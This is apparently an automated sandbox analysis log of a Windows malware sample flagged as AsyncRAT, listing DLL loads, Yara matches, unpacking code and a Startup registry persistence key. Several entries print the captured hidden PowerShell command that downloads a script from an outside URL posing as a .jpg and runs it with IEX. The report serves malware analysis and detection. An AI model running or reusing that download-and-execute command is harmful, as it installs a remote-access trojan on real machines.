Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2147594470.000002D0EA515000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35T source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000003.00000002.2156086664.000002D0EADCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb06-23.cr source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb=u source: powershell.exe, 00000003.00000002.2156086664.000002D0EADC2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 20.2.powershell.exe.1696855aa18.7.raw.unpack, c599d343cac5014aad62aae883c42172b.cs	.Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, PthZREljnNV.cs	.Net Code: qstxLLGxVdmV System.AppDomain.Load(byte[])
Source: 20.2.powershell.exe.1697d090000.8.raw.unpack, c599d343cac5014aad62aae883c42172b.cs	.Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, PthZREljnNV.cs	.Net Code: qstxLLGxVdmV System.AppDomain.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($base64EncodedData)$ms = New-Object System.IO.MemoryStream$ms.Write($compressedData, 0, $compressedData.Length)$ms.Position = 0$gzip = New-Object System.IO.Compression.GZipStream $ms,

PowerShell case anomaly found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"			Jump to behavior

Yara detected MSILLoadEncryptedAssembly

Source: Yara match	File source: 00000003.00000002.2145116702.000002D0E8D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2148322644.000002D0EA550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2142358779.000002D0E8A97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2142358779.000002D0E8A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2142358779.000002D0E8B1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2145516549.000002D0EA4A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1970750932.000002D080BFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2150967102.000002D0EAC7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2145516549.000002D0EA450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1970750932.000002D080001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8963E1 push ebx; iretd	3_2_00007FFD9B89642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B896435 push ebx; iretd	3_2_00007FFD9B89642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8A7969 push ebx; retf	3_2_00007FFD9B8A796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B96840F push es; iretd	3_2_00007FFD9B9684D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B966B6A push edx; iretd	3_2_00007FFD9B966B6B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9680A4 push eax; iretd	3_2_00007FFD9B9680A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B968CEF push D0EAC3E6h; ret	3_2_00007FFD9B968DBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFD9B8855CB push esi; iretd	20_2_00007FFD9B8855D7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFD9B950569 push ebx; retf	20_2_00007FFD9B95056A

Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, kEATXgYVyVrvxy.cs	High entropy of concatenated method names: 'ROeqrbrlPJkT', 'AhvylPcWTOpxfGTU', 'xAtTwuQqkZHivGv', 'HXDiYhJTxgbzc', 'pSYGgvoVomen', 'BSKnlGNWBa', 'bshpBcBUAhSDGdX', 'hNrHesxBaHRtw', 'QXZppqQhOqmc', 'cwXvDaDJPUti'
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, kEATXgYVyVrvxy.cs	High entropy of concatenated method names: 'ROeqrbrlPJkT', 'AhvylPcWTOpxfGTU', 'xAtTwuQqkZHivGv', 'HXDiYhJTxgbzc', 'pSYGgvoVomen', 'BSKnlGNWBa', 'bshpBcBUAhSDGdX', 'hNrHesxBaHRtw', 'QXZppqQhOqmc', 'cwXvDaDJPUti'

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR

Creates an undocumented autostart registry key

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
